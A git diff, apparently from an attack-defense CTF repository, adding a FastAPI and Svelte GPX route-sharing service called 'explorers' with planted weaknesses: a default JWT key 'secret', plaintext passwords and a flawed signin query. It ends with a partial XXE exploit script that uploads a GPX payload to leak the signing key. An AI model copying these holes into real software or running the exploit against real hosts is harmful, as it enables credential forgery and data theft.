+++ b/services/explorers/front/build/_app/immutable/nodes/6.99c00b50.js
@@ -0,0 +1 @@
+import{s as re,f as l,a as N,g as i,h as f,d as o,c as V,u as X,j as e,i as A,v as s,H as le,M as ie,l as oe,m as ce,n as de}from"../chunks/scheduler.1f572272.js";import{S as ue,i as fe,b as Y,d as Z,m as ee,a as te,t as se,e as ae}from"../chunks/index.b942bf85.js";import{g as pe,i as me}from"../chunks/navigation.263462fb.js";import{P as he,L as ve}from"../chunks/LockClosed.36d30438.js";import{P as _e}from"../chunks/public.550f299c.js";function ne(h){let a,d,t;return{c(){a=l("div"),d=l("div"),t=oe(h[0]),this.h()},l(r){a=i(r,"DIV",{class:!0});var p=f(a);d=i(p,"DIV",{class:!0});var m=f(d);t=ce(m,h[0]),m.forEach(o),p.forEach(o),this.h()},h(){e(d,"class","notification is-danger"),e(a,"class","container")},m(r,p){A(r,a,p),s(a,d),s(d,t)},p(r,p){p&1&&de(t,r[0])},d(r){r&&o(a)}}}function ge(h){let a,d,t,r,p='',m,v,_,u,y,g,I,H,D,w,U,L,$,P,j,b,S,B,T,J='
',x,F,R,c=h[0]&&ne(h);return w=new he({}),S=new ve({}),{c(){a=l("section"),c&&c.c(),d=N(),t=l("section"),r=l("div"),r.innerHTML=p,m=N(),v=l("div"),_=l("div"),u=l("form"),y=l("div"),g=l("p"),I=l("input"),H=N(),D=l("span"),Y(w.$$.fragment),U=N(),L=l("div"),$=l("p"),P=l("input"),j=N(),b=l("span"),Y(S.$$.fragment),B=N(),T=l("div"),T.innerHTML=J,this.h()},l(n){a=i(n,"SECTION",{class:!0});var E=f(a);c&&c.l(E),E.forEach(o),d=V(n),t=i(n,"SECTION",{class:!0});var M=f(t);r=i(M,"DIV",{class:!0,"data-svelte-h":!0}),X(r)!=="svelte-15twxn6"&&(r.innerHTML=p),m=V(M),v=i(M,"DIV",{class:!0});var q=f(v);_=i(q,"DIV",{class:!0});var z=f(_);u=i(z,"FORM",{});var C=f(u);y=i(C,"DIV",{class:!0});var G=f(y);g=i(G,"P",{class:!0});var O=f(g);I=i(O,"INPUT",{class:!0,name:!0,type:!0,placeholder:!0}),H=V(O),D=i(O,"SPAN",{class:!0});var K=f(D);Z(w.$$.fragment,K),K.forEach(o),O.forEach(o),G.forEach(o),U=V(C),L=i(C,"DIV",{class:!0});var Q=f(L);$=i(Q,"P",{class:!0});var k=f($);P=i(k,"INPUT",{class:!0,name:!0,type:!0,placeholder:!0}),j=V(k),b=i(k,"SPAN",{class:!0});var W=f(b);Z(S.$$.fragment,W),W.forEach(o),k.forEach(o),Q.forEach(o),B=V(C),T=i(C,"DIV",{class:!0,"data-svelte-h":!0}),X(T)!=="svelte-8i1fac"&&(T.innerHTML=J),C.forEach(o),z.forEach(o),q.forEach(o),M.forEach(o),this.h()},h(){e(a,"class","section"),e(r,"class","columns is-centered"),e(I,"class","input"),e(I,"name","username"),e(I,"type","text"),e(I,"placeholder","Username"),e(D,"class","icon is-small is-left"),e(g,"class","control has-icons-left has-icons-right"),e(y,"class","field"),e(P,"class","input"),e(P,"name","password"),e(P,"type","password"),e(P,"placeholder","Password"),e(b,"class","icon is-small is-left"),e($,"class","control has-icons-left"),e(L,"class","field"),e(T,"class","field"),e(_,"class","column is-half has-text-centered"),e(v,"class","columns is-centered"),e(t,"class","section")},m(n,E){A(n,a,E),c&&c.m(a,null),A(n,d,E),A(n,t,E),s(t,r),s(t,m),s(t,v),s(v,_),s(_,u),s(u,y),s(y,g),s(g,I),s(g,H),s(g,D),ee(w,D,null),s(u,U),s(u,L),s(L,$),s($,P),s($,j),s($,b),ee(S,b,null),s(u,B),s(u,T),x=!0,F||(R=le(u,"submit",ie(h[1])),F=!0)},p(n,[E]){n[0]?c?c.p(n,E):(c=ne(n),c.c(),c.m(a,null)):c&&(c.d(1),c=null)},i(n){x||(te(w.$$.fragment,n),te(S.$$.fragment,n),x=!0)},o(n){se(w.$$.fragment,n),se(S.$$.fragment,n),x=!1},d(n){n&&(o(a),o(d),o(t)),c&&c.d(),ae(w),ae(S),F=!1,R()}}}function $e(h,a,d){let t;async function r(p){const m=new FormData(p.currentTarget);let v=m.get("username"),_=m.get("password");try{const u=await fetch(`${_e}/signin`,{method:"POST",headers:{"Content-Type":"application/json"},credentials:"include",body:JSON.stringify({username:v,password:_})});if(u.ok){await pe("/",{invalidateAll:!0});return}d(0,t=await u.text());try{d(0,t=JSON.parse(t).detail.error)}catch{}}catch(u){d(0,t=u.toString())}await me()}return[t,r]}class Se extends ue{constructor(a){super(),fe(this,a,$e,ge,re,{})}}export{Se as component};
diff --git a/services/explorers/front/build/_app/immutable/nodes/7.046c891e.js b/services/explorers/front/build/_app/immutable/nodes/7.046c891e.js
new file mode 100644
index 0000000..a5ce7f5
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/nodes/7.046c891e.js
@@ -0,0 +1 @@
+import{s as re,f as l,a as N,g as i,h as f,d as o,c as V,u as X,j as e,i as x,v as s,H as le,M as ie,l as oe,m as ce,n as de}from"../chunks/scheduler.1f572272.js";import{S as ue,i as fe,b as Y,d as Z,m as ee,a as te,t as se,e as ae}from"../chunks/index.b942bf85.js";import{g as pe,i as me}from"../chunks/navigation.263462fb.js";import{P as he,L as ve}from"../chunks/LockClosed.36d30438.js";import{P as _e}from"../chunks/public.550f299c.js";function ne(h){let a,d,t;return{c(){a=l("div"),d=l("div"),t=oe(h[0]),this.h()},l(r){a=i(r,"DIV",{class:!0});var p=f(a);d=i(p,"DIV",{class:!0});var m=f(d);t=ce(m,h[0]),m.forEach(o),p.forEach(o),this.h()},h(){e(d,"class","notification is-danger"),e(a,"class","container")},m(r,p){x(r,a,p),s(a,d),s(d,t)},p(r,p){p&1&&de(t,r[0])},d(r){r&&o(a)}}}function ge(h){let a,d,t,r,p='',m,v,_,u,y,g,w,A,D,I,H,L,$,P,j,b,S,B,T,J='
',M,F,R,c=h[0]&&ne(h);return I=new he({}),S=new ve({}),{c(){a=l("section"),c&&c.c(),d=N(),t=l("section"),r=l("div"),r.innerHTML=p,m=N(),v=l("div"),_=l("div"),u=l("form"),y=l("div"),g=l("p"),w=l("input"),A=N(),D=l("span"),Y(I.$$.fragment),H=N(),L=l("div"),$=l("p"),P=l("input"),j=N(),b=l("span"),Y(S.$$.fragment),B=N(),T=l("div"),T.innerHTML=J,this.h()},l(n){a=i(n,"SECTION",{class:!0});var E=f(a);c&&c.l(E),E.forEach(o),d=V(n),t=i(n,"SECTION",{class:!0});var O=f(t);r=i(O,"DIV",{class:!0,"data-svelte-h":!0}),X(r)!=="svelte-13w7eoo"&&(r.innerHTML=p),m=V(O),v=i(O,"DIV",{class:!0});var q=f(v);_=i(q,"DIV",{class:!0});var z=f(_);u=i(z,"FORM",{});var C=f(u);y=i(C,"DIV",{class:!0});var G=f(y);g=i(G,"P",{class:!0});var U=f(g);w=i(U,"INPUT",{class:!0,name:!0,type:!0,placeholder:!0}),A=V(U),D=i(U,"SPAN",{class:!0});var K=f(D);Z(I.$$.fragment,K),K.forEach(o),U.forEach(o),G.forEach(o),H=V(C),L=i(C,"DIV",{class:!0});var Q=f(L);$=i(Q,"P",{class:!0});var k=f($);P=i(k,"INPUT",{class:!0,name:!0,type:!0,placeholder:!0}),j=V(k),b=i(k,"SPAN",{class:!0});var W=f(b);Z(S.$$.fragment,W),W.forEach(o),k.forEach(o),Q.forEach(o),B=V(C),T=i(C,"DIV",{class:!0,"data-svelte-h":!0}),X(T)!=="svelte-1w4lgya"&&(T.innerHTML=J),C.forEach(o),z.forEach(o),q.forEach(o),O.forEach(o),this.h()},h(){e(a,"class","section"),e(r,"class","columns is-centered"),e(w,"class","input"),e(w,"name","username"),e(w,"type","text"),e(w,"placeholder","Username"),e(D,"class","icon is-small is-left"),e(g,"class","control has-icons-left has-icons-right"),e(y,"class","field"),e(P,"class","input"),e(P,"name","password"),e(P,"type","password"),e(P,"placeholder","Password"),e(b,"class","icon is-small is-left"),e($,"class","control has-icons-left"),e(L,"class","field"),e(T,"class","field"),e(_,"class","column is-half has-text-centered"),e(v,"class","columns is-centered"),e(t,"class","section")},m(n,E){x(n,a,E),c&&c.m(a,null),x(n,d,E),x(n,t,E),s(t,r),s(t,m),s(t,v),s(v,_),s(_,u),s(u,y),s(y,g),s(g,w),s(g,A),s(g,D),ee(I,D,null),s(u,H),s(u,L),s(L,$),s($,P),s($,j),s($,b),ee(S,b,null),s(u,B),s(u,T),M=!0,F||(R=le(u,"submit",ie(h[1])),F=!0)},p(n,[E]){n[0]?c?c.p(n,E):(c=ne(n),c.c(),c.m(a,null)):c&&(c.d(1),c=null)},i(n){M||(te(I.$$.fragment,n),te(S.$$.fragment,n),M=!0)},o(n){se(I.$$.fragment,n),se(S.$$.fragment,n),M=!1},d(n){n&&(o(a),o(d),o(t)),c&&c.d(),ae(I),ae(S),F=!1,R()}}}function $e(h,a,d){let t;async function r(p){const m=new FormData(p.currentTarget);let v=m.get("username"),_=m.get("password");try{const u=await fetch(`${_e}/signup`,{method:"POST",headers:{"Content-Type":"application/json"},credentials:"include",body:JSON.stringify({username:v,password:_})});if(u.ok){await pe("/",{invalidateAll:!0});return}d(0,t=await u.text());try{d(0,t=JSON.parse(t).detail.error)}catch{}}catch(u){d(0,t=u.toString())}await me()}return[t,r]}class Se extends ue{constructor(a){super(),fe(this,a,$e,ge,re,{})}}export{Se as component};
diff --git a/services/explorers/front/build/_app/immutable/nodes/7.1ca30cae.js b/services/explorers/front/build/_app/immutable/nodes/7.1ca30cae.js
new file mode 100644
index 0000000..aaaadd6
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/nodes/7.1ca30cae.js
@@ -0,0 +1 @@
+import{s as re,f as l,a as N,g as i,h as f,d as o,c as V,u as X,j as e,i as x,v as s,H as le,M as ie,l as oe,m as ce,n as de}from"../chunks/scheduler.1f572272.js";import{S as ue,i as fe,b as Y,d as Z,m as ee,a as te,t as se,e as ae}from"../chunks/index.b942bf85.js";import{g as pe,i as me}from"../chunks/navigation.872e8737.js";import{P as he,L as ve}from"../chunks/LockClosed.36d30438.js";import{P as _e}from"../chunks/public.aa8ed6af.js";function ne(h){let a,d,t;return{c(){a=l("div"),d=l("div"),t=oe(h[0]),this.h()},l(r){a=i(r,"DIV",{class:!0});var p=f(a);d=i(p,"DIV",{class:!0});var m=f(d);t=ce(m,h[0]),m.forEach(o),p.forEach(o),this.h()},h(){e(d,"class","notification is-danger"),e(a,"class","container")},m(r,p){x(r,a,p),s(a,d),s(d,t)},p(r,p){p&1&&de(t,r[0])},d(r){r&&o(a)}}}function ge(h){let a,d,t,r,p='',m,v,_,u,y,g,w,A,D,I,H,L,$,P,j,b,S,B,T,J='
',M,F,R,c=h[0]&&ne(h);return I=new he({}),S=new ve({}),{c(){a=l("section"),c&&c.c(),d=N(),t=l("section"),r=l("div"),r.innerHTML=p,m=N(),v=l("div"),_=l("div"),u=l("form"),y=l("div"),g=l("p"),w=l("input"),A=N(),D=l("span"),Y(I.$$.fragment),H=N(),L=l("div"),$=l("p"),P=l("input"),j=N(),b=l("span"),Y(S.$$.fragment),B=N(),T=l("div"),T.innerHTML=J,this.h()},l(n){a=i(n,"SECTION",{class:!0});var E=f(a);c&&c.l(E),E.forEach(o),d=V(n),t=i(n,"SECTION",{class:!0});var O=f(t);r=i(O,"DIV",{class:!0,"data-svelte-h":!0}),X(r)!=="svelte-13w7eoo"&&(r.innerHTML=p),m=V(O),v=i(O,"DIV",{class:!0});var q=f(v);_=i(q,"DIV",{class:!0});var z=f(_);u=i(z,"FORM",{});var C=f(u);y=i(C,"DIV",{class:!0});var G=f(y);g=i(G,"P",{class:!0});var U=f(g);w=i(U,"INPUT",{class:!0,name:!0,type:!0,placeholder:!0}),A=V(U),D=i(U,"SPAN",{class:!0});var K=f(D);Z(I.$$.fragment,K),K.forEach(o),U.forEach(o),G.forEach(o),H=V(C),L=i(C,"DIV",{class:!0});var Q=f(L);$=i(Q,"P",{class:!0});var k=f($);P=i(k,"INPUT",{class:!0,name:!0,type:!0,placeholder:!0}),j=V(k),b=i(k,"SPAN",{class:!0});var W=f(b);Z(S.$$.fragment,W),W.forEach(o),k.forEach(o),Q.forEach(o),B=V(C),T=i(C,"DIV",{class:!0,"data-svelte-h":!0}),X(T)!=="svelte-1w4lgya"&&(T.innerHTML=J),C.forEach(o),z.forEach(o),q.forEach(o),O.forEach(o),this.h()},h(){e(a,"class","section"),e(r,"class","columns is-centered"),e(w,"class","input"),e(w,"name","username"),e(w,"type","text"),e(w,"placeholder","Username"),e(D,"class","icon is-small is-left"),e(g,"class","control has-icons-left has-icons-right"),e(y,"class","field"),e(P,"class","input"),e(P,"name","password"),e(P,"type","password"),e(P,"placeholder","Password"),e(b,"class","icon is-small is-left"),e($,"class","control has-icons-left"),e(L,"class","field"),e(T,"class","field"),e(_,"class","column is-half has-text-centered"),e(v,"class","columns is-centered"),e(t,"class","section")},m(n,E){x(n,a,E),c&&c.m(a,null),x(n,d,E),x(n,t,E),s(t,r),s(t,m),s(t,v),s(v,_),s(_,u),s(u,y),s(y,g),s(g,w),s(g,A),s(g,D),ee(I,D,null),s(u,H),s(u,L),s(L,$),s($,P),s($,j),s($,b),ee(S,b,null),s(u,B),s(u,T),M=!0,F||(R=le(u,"submit",ie(h[1])),F=!0)},p(n,[E]){n[0]?c?c.p(n,E):(c=ne(n),c.c(),c.m(a,null)):c&&(c.d(1),c=null)},i(n){M||(te(I.$$.fragment,n),te(S.$$.fragment,n),M=!0)},o(n){se(I.$$.fragment,n),se(S.$$.fragment,n),M=!1},d(n){n&&(o(a),o(d),o(t)),c&&c.d(),ae(I),ae(S),F=!1,R()}}}function $e(h,a,d){let t;async function r(p){const m=new FormData(p.currentTarget);let v=m.get("username"),_=m.get("password");try{const u=await fetch(`${_e}/signup`,{method:"POST",headers:{"Content-Type":"application/json"},credentials:"include",body:JSON.stringify({username:v,password:_})});if(u.ok){await pe("/",{invalidateAll:!0});return}d(0,t=await u.text());try{d(0,t=JSON.parse(t).detail.error)}catch{}}catch(u){d(0,t=u.toString())}await me()}return[t,r]}class Se extends ue{constructor(a){super(),fe(this,a,$e,ge,re,{})}}export{Se as component};
diff --git a/services/explorers/front/build/_app/version.json b/services/explorers/front/build/_app/version.json
new file mode 100644
index 0000000..ff8541f
--- /dev/null
+++ b/services/explorers/front/build/_app/version.json
@@ -0,0 +1 @@
+{"version":"1701826847895"}
\ No newline at end of file
diff --git a/services/explorers/front/build/favicon.png b/services/explorers/front/build/favicon.png
new file mode 100644
index 0000000..0c63270
Binary files /dev/null and b/services/explorers/front/build/favicon.png differ
diff --git a/services/explorers/front/build/index.html b/services/explorers/front/build/index.html
new file mode 100644
index 0000000..cf0be2c
--- /dev/null
+++ b/services/explorers/front/build/index.html
@@ -0,0 +1,35 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/services/explorers/front/build/robots.txt b/services/explorers/front/build/robots.txt
new file mode 100644
index 0000000..e9e57dc
--- /dev/null
+++ b/services/explorers/front/build/robots.txt
@@ -0,0 +1,3 @@
+# https://www.robotstxt.org/robotstxt.html
+User-agent: *
+Disallow:
diff --git a/services/explorers/src/app/__init__.py b/services/explorers/src/app/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/services/explorers/src/app/api.py b/services/explorers/src/app/api.py
new file mode 100644
index 0000000..6e53ae3
--- /dev/null
+++ b/services/explorers/src/app/api.py
@@ -0,0 +1,216 @@
+from functools import lru_cache
+
+import fastapi
+import gpxpy
+from fastapi import APIRouter
+
+from app import auth, config, models, dto, serializers
+
+api = APIRouter()
+
+
+@lru_cache()
+def jwt_helper() -> auth.JWTHelper:
+ return auth.JWTHelper(config.get_settings().jwt_key)
+
+
+async def get_current_user(request: fastapi.Request) -> str:
+ jwt_help = jwt_helper()
+ try:
+ api_token = request.cookies.get('Api-Token') or request.headers.get('X-Api-Token')
+ if api_token is None:
+ raise ValueError("Empty Api-Token/cookie")
+ user_data = jwt_help.decode_token(api_token.encode())
+ except Exception as e:
+ raise fastapi.HTTPException(
+ status_code=fastapi.status.HTTP_401_UNAUTHORIZED,
+ detail=json_error("Could not validate credentials"),
+ )
+
+ if not user_data:
+ raise fastapi.HTTPException(
+ status_code=fastapi.status.HTTP_401_UNAUTHORIZED,
+ detail=json_error("Could not validate credentials"),
+ )
+
+ user_id = user_data.get('user_id')
+ return user_id
+
+
+def gen_route_token(route_id: str) -> str:
+ return jwt_helper().gen_token({'route_id': route_id})
+
+
+def json_error(error):
+ return {'error': error}
+
+
+def serialize_route(route):
+ route_dto = serializers.RouteSerializer.serialize(route)
+ route_dto.share_token = gen_route_token(f'{route.id}')
+ return route_dto
+
+
+async def get_route_by_id(route_id) -> models.Route:
+ route = await models.Route.get(route_id)
+ if not route:
+ raise fastapi.HTTPException(
+ status_code=fastapi.status.HTTP_404_NOT_FOUND,
+ detail=json_error('Route not found')
+ )
+ return route
+
+
+@api.post('/signup')
+async def signup_handler(response: fastapi.Response, auth_req: dto.AuthRequest):
+ existing = await models.User.find(models.User.username == auth_req.username).first_or_none()
+ if existing:
+ raise fastapi.HTTPException(
+ status_code=fastapi.status.HTTP_412_PRECONDITION_FAILED,
+ detail=json_error('user already exists')
+ )
+
+ user = models.User(username=auth_req.username, password=auth_req.password)
+ await user.insert()
+
+ token = jwt_helper().gen_token({'user_id': f'{user.id}'})
+ response.set_cookie("Api-Token", token)
+ return {'user_id': f'{user.id}', 'api_token': token}
+
+
+@api.post('/signin')
+async def signin_handler(response: fastapi.Response, auth_req: dto.AuthRequest):
+ user = await models.User.find(
+ models.User.username == auth_req.username and models.User.password == auth_req.password).first_or_none()
+ if not user:
+ raise fastapi.HTTPException(
+ status_code=fastapi.status.HTTP_404_NOT_FOUND,
+ detail=json_error('user not found or invalid password')
+ )
+
+ token = jwt_helper().gen_token({'user_id': f'{user.id}'})
+ response.set_cookie("Api-Token", token)
+ return {'user_id': f'{user.id}', 'api_token': token}
+
+
+@api.get('/user')
+async def get_user(user_id: str = fastapi.Depends(get_current_user)):
+ user = await models.User.get(user_id)
+ if not user:
+ raise fastapi.HTTPException(
+ status_code=fastapi.status.HTTP_404_NOT_FOUND,
+ detail=json_error('user not found')
+ )
+ return serializers.UserSerializer.serialize(user)
+
+
+@api.post('/logout')
+def logout_handler(response: fastapi.Response):
+ response.delete_cookie("Api-Token")
+ return {'status': 'ok'}
+
+
+@api.post('/route/create')
+async def route_create_handler(create_req: dto.CreateRouteRequest, user_id: str = fastapi.Depends(get_current_user)):
+ route = models.Route(title=create_req.title,
+ description=create_req.description, user_id=user_id,
+ track_points=[], waypoints=[])
+ await route.insert()
+
+ return serialize_route(route)
+
+
+@api.get('/route')
+async def route_list(user_id: str = fastapi.Depends(get_current_user)):
+ routes = await models.Route.find(models.Route.user_id == user_id).to_list()
+ return [serialize_route(route) for route in routes]
+
+
+@api.get('/route/{route_id}')
+async def route_get(route_id: str, user_id: str = fastapi.Depends(get_current_user), token: str | None = None):
+ route = await get_route_by_id(route_id)
+
+ if token and jwt_helper().decode_token(token.encode()).get('route_id') == route_id:
+ return serialize_route(route)
+
+ if route.user_id != user_id:
+ raise fastapi.HTTPException(
+ status_code=fastapi.status.HTTP_403_FORBIDDEN,
+ detail=json_error('You are not allowed to view this route')
+ )
+
+ return serialize_route(route)
+
+
+@api.post('/route/{route_id}/update')
+async def update_route(route_id: str, update_req: dto.UpdateRouteRequest,
+ user_id: str = fastapi.Depends(get_current_user)):
+ route = await get_route_by_id(route_id)
+ if route.user_id != user_id:
+ raise fastapi.HTTPException(
+ status_code=fastapi.status.HTTP_403_FORBIDDEN,
+ detail=json_error('You are not allowed to modify this route')
+ )
+
+ if update_req.title:
+ route.title = update_req.title
+ if update_req.description:
+ route.description = update_req.description
+ if update_req.waypoints:
+ route.waypoints = [serializers.WaypointSerializer.to_model(waypoint) for waypoint in update_req.waypoints]
+ if update_req.track_points:
+ route.track_points = [serializers.TrackPointSerializer.to_model(track_point) for track_point in
+ update_req.track_points]
+
+ await route.save()
+
+ return serialize_route(route)
+
+
+@api.post('/route/{route_id}/upload')
+async def route_upload(route_id: str,
+ file: fastapi.UploadFile,
+ user_id: str = fastapi.Depends(get_current_user)):
+ route = await get_route_by_id(route_id)
+ if route.user_id != user_id:
+ raise fastapi.HTTPException(
+ status_code=fastapi.status.HTTP_403_FORBIDDEN,
+ detail=json_error('You are not allowed to modify this route')
+ )
+
+ try:
+ gpx = gpxpy.parse(file.file)
+ waypoints = [
+ models.Waypoint(
+ lat=f'{waypoint.latitude}',
+ lon=f'{waypoint.longitude}',
+ ele=f'{waypoint.elevation}' if waypoint.elevation else None,
+ name=waypoint.name,
+ desc=waypoint.description,
+ comment=waypoint.comment,
+ sym=waypoint.symbol,
+ time=waypoint.time.isoformat() if waypoint.time else None,
+ )
+ for waypoint in gpx.waypoints
+ ]
+ track_points = [
+ models.TrackPoint(
+ lat=f'{point.latitude}',
+ lon=f'{point.longitude}',
+ ele=f'{point.elevation}' if point.elevation else None,
+ time=f'{point.time}',
+ )
+ for track in gpx.tracks
+ for segment in track.segments
+ for point in segment.points
+ ]
+ route.waypoints = waypoints
+ route.track_points = track_points
+ await route.save()
+ except Exception as e:
+ raise fastapi.HTTPException(
+ status_code=fastapi.status.HTTP_500_INTERNAL_SERVER_ERROR,
+ detail=json_error(f'Could not parse GPX file')
+ )
+
+ return serialize_route(route)
diff --git a/services/explorers/src/app/app.py b/services/explorers/src/app/app.py
new file mode 100644
index 0000000..f77999a
--- /dev/null
+++ b/services/explorers/src/app/app.py
@@ -0,0 +1,25 @@
+from fastapi import FastAPI
+from starlette.requests import Request
+from starlette.responses import JSONResponse
+
+from app.db import init_db
+from app.api import api
+
+app = FastAPI()
+from .config import get_settings
+
+
+@app.on_event("startup")
+async def start_db():
+ await init_db(get_settings().mongo_uri)
+
+
+@app.exception_handler(ValueError)
+async def value_error_exception_handler(request: Request, exc: ValueError):
+ return JSONResponse(
+ status_code=400,
+ content={"error": str(exc)},
+ )
+
+
+app.include_router(api, prefix="/api")
diff --git a/services/explorers/src/app/auth.py b/services/explorers/src/app/auth.py
new file mode 100644
index 0000000..e3a4261
--- /dev/null
+++ b/services/explorers/src/app/auth.py
@@ -0,0 +1,24 @@
+import logging
+
+import jwt
+
+
+class JWTHelper(object):
+ ALGORITHM = "HS256"
+
+ def __init__(self, security_key):
+ self.security_key = security_key
+
+ def gen_token(self, data):
+ try:
+ return jwt.encode(data, self.security_key, algorithm=self.ALGORITHM)
+ except Exception as e:
+ logging.error("failed to generate jwt token: {}".format(e))
+ return ""
+
+ def decode_token(self, cookie):
+ try:
+ return jwt.decode(cookie, self.security_key, algorithms=[self.ALGORITHM, ])
+ except Exception as e:
+ logging.error("failed to decode jwt token: {}".format(e))
+ return None
diff --git a/services/explorers/src/app/config.py b/services/explorers/src/app/config.py
new file mode 100644
index 0000000..24be018
--- /dev/null
+++ b/services/explorers/src/app/config.py
@@ -0,0 +1,15 @@
+from functools import lru_cache
+
+from pydantic_settings import BaseSettings, SettingsConfigDict
+
+
+class Settings(BaseSettings):
+ jwt_key: str = 'secret'
+ mongo_uri: str = 'mongodb://localhost:27017'
+
+ model_config = SettingsConfigDict(env_file="app.env")
+
+
+@lru_cache
+def get_settings():
+ return Settings()
diff --git a/services/explorers/src/app/db.py b/services/explorers/src/app/db.py
new file mode 100644
index 0000000..e6d22ab
--- /dev/null
+++ b/services/explorers/src/app/db.py
@@ -0,0 +1,12 @@
+from beanie import init_beanie
+import motor.motor_asyncio
+
+from app import models
+
+
+async def init_db(mongo_uri):
+ client = motor.motor_asyncio.AsyncIOMotorClient(
+ mongo_uri
+ )
+
+ await init_beanie(database=client.db_name, document_models=[models.User, models.Route])
diff --git a/services/explorers/src/app/dto.py b/services/explorers/src/app/dto.py
new file mode 100644
index 0000000..eebcae2
--- /dev/null
+++ b/services/explorers/src/app/dto.py
@@ -0,0 +1,53 @@
+from typing import Optional
+
+from pydantic import BaseModel, Field
+
+
+class AuthRequest(BaseModel):
+ username: str
+ password: str
+
+
+class User(BaseModel):
+ id: str
+ username: str
+
+
+class CreateRouteRequest(BaseModel):
+ title: str
+ description: str
+
+
+class TrackPoint(BaseModel):
+ lat: str
+ lon: str
+ ele: Optional[str]
+ time: Optional[str]
+
+
+class Waypoint(BaseModel):
+ lat: str
+ lon: str
+ ele: Optional[str]
+ name: str
+ desc: Optional[str]
+ comment: Optional[str]
+ sym: Optional[str]
+ time: Optional[str]
+
+
+class Route(BaseModel):
+ id: str
+ title: str
+ user_id: str
+ description: str
+ track_points: list[TrackPoint]
+ waypoints: list[Waypoint]
+ share_token: Optional[str]
+
+
+class UpdateRouteRequest(BaseModel):
+ title: Optional[str] = None
+ description: Optional[str] = None
+ track_points: list[TrackPoint]
+ waypoints: list[Waypoint]
diff --git a/services/explorers/src/app/models.py b/services/explorers/src/app/models.py
new file mode 100644
index 0000000..0e11e92
--- /dev/null
+++ b/services/explorers/src/app/models.py
@@ -0,0 +1,40 @@
+import pydantic
+from beanie import Document
+from typing import Optional
+
+
+class User(Document):
+ username: str
+ password: str
+
+ class Settings:
+ name = "users"
+
+
+class TrackPoint(pydantic.BaseModel):
+ lat: str
+ lon: str
+ ele: Optional[str]
+ time: Optional[str]
+
+
+class Waypoint(pydantic.BaseModel):
+ lat: str
+ lon: str
+ ele: Optional[str]
+ name: str
+ desc: Optional[str]
+ comment: Optional[str]
+ sym: Optional[str]
+ time: Optional[str]
+
+
+class Route(Document):
+ title: str
+ user_id: str
+ description: str
+ track_points: list[TrackPoint]
+ waypoints: list[Waypoint]
+
+ class Settings:
+ name = "routes"
diff --git a/services/explorers/src/app/serializers.py b/services/explorers/src/app/serializers.py
new file mode 100644
index 0000000..cf28d0b
--- /dev/null
+++ b/services/explorers/src/app/serializers.py
@@ -0,0 +1,74 @@
+from app import models
+from app import dto
+
+
+class UserSerializer:
+ @staticmethod
+ def serialize(user: models.User) -> dto.User:
+ return dto.User(
+ id=f'{user.id}',
+ username=user.username,
+ )
+
+
+class WaypointSerializer:
+ @staticmethod
+ def to_model(waypoint: dto.Waypoint) -> models.Waypoint:
+ return models.Waypoint(
+ lat=waypoint.lat,
+ sym=waypoint.sym,
+ lon=waypoint.lon,
+ ele=waypoint.ele,
+ name=waypoint.name,
+ desc=waypoint.desc,
+ comment=waypoint.comment,
+ time=waypoint.time,
+ )
+
+ @staticmethod
+ def serialize(waypoint: models.Waypoint) -> dto.Waypoint:
+ return dto.Waypoint(
+ lat=waypoint.lat,
+ sym=waypoint.sym,
+ lon=waypoint.lon,
+ ele=waypoint.ele,
+ name=waypoint.name,
+ desc=waypoint.desc,
+ comment=waypoint.comment,
+ time=waypoint.time,
+ )
+
+
+class TrackPointSerializer:
+ @staticmethod
+ def to_model(track_point: dto.TrackPoint) -> models.TrackPoint:
+ return models.TrackPoint(
+ lat=track_point.lat,
+ lon=track_point.lon,
+ ele=track_point.ele,
+ time=track_point.time,
+ )
+
+ @staticmethod
+ def serialize(track_point: models.TrackPoint) -> dto.TrackPoint:
+ return dto.TrackPoint(
+ lat=track_point.lat,
+ lon=track_point.lon,
+ ele=track_point.ele,
+ time=track_point.time,
+ )
+
+
+class RouteSerializer:
+
+ @staticmethod
+ def serialize(route: models.Route):
+ return dto.Route(
+ id=f'{route.id}',
+ title=route.title,
+ user_id=route.user_id,
+ description=route.description,
+ track_points=[TrackPointSerializer.serialize(track_point) for track_point in route.track_points],
+ waypoints=[WaypointSerializer.serialize(waypoint) for waypoint in route.waypoints],
+ share_token=None,
+ )
diff --git a/services/explorers/src/main.py b/services/explorers/src/main.py
new file mode 100644
index 0000000..a1708f4
--- /dev/null
+++ b/services/explorers/src/main.py
@@ -0,0 +1,17 @@
+import logging
+import os
+import sys
+
+import uvicorn
+
+if __name__ == "__main__":
+ root = logging.getLogger()
+ root.setLevel(logging.INFO)
+
+ handler = logging.StreamHandler(sys.stderr)
+ handler.setLevel(logging.INFO)
+ formatter = logging.Formatter('%(levelname)s - %(message)s')
+ handler.setFormatter(formatter)
+ root.addHandler(handler)
+ uvicorn.run("app.app:app", port=8000, reload=False, access_log=True, host='0.0.0.0',
+ workers=int(os.getenv('NUM_WORKERS', '5')))
diff --git a/services/explorers/src/requirements.txt b/services/explorers/src/requirements.txt
new file mode 100644
index 0000000..f015a87
--- /dev/null
+++ b/services/explorers/src/requirements.txt
@@ -0,0 +1,23 @@
+annotated-types==0.6.0
+anyio==3.7.1
+beanie==1.23.6
+gpxpy==1.6.1
+click==8.1.7
+dnspython==2.4.2
+fastapi==0.104.1
+h11==0.14.0
+idna==3.4
+lazy-model==0.2.0
+motor==3.3.1
+pydantic==2.5.0
+pydantic_core==2.14.1
+pydantic-settings==2.1.0
+PyJWT==2.8.0
+pymongo==4.6.0
+sniffio==1.3.0
+starlette==0.27.0
+toml==0.10.2
+python-multipart==0.0.6
+typing_extensions==4.8.0
+uvicorn==0.24.0.post1
+lxml==4.9.3
\ No newline at end of file
diff --git a/sploits/explorers/xxe.py b/sploits/explorers/xxe.py
new file mode 100644
index 0000000..01f748f
--- /dev/null
+++ b/sploits/explorers/xxe.py
@@ -0,0 +1,64 @@
+import re
+import jwt
+import checklib
+import sys
+
+import requests
+
+pld = '''
+]>
+
+
+650.4
+2024-04-03T00:12:51.294446
+a
+b
+&test;
+
+
+
+
+650
+2024-04-03T00:12:23.294446
+
+
+650.4
+2024-04-03T00:12:51.294446
+
+
+
+ '''
+
+
+def leak_key(sess: requests.Session, host: str):
+ resp = sess.post(f'{host}/api/route/create', json={
+ 'title': 'a',
+ 'description': 'b'
+ })
+ assert resp.status_code == 200
+ route_id = resp.json().get('id')
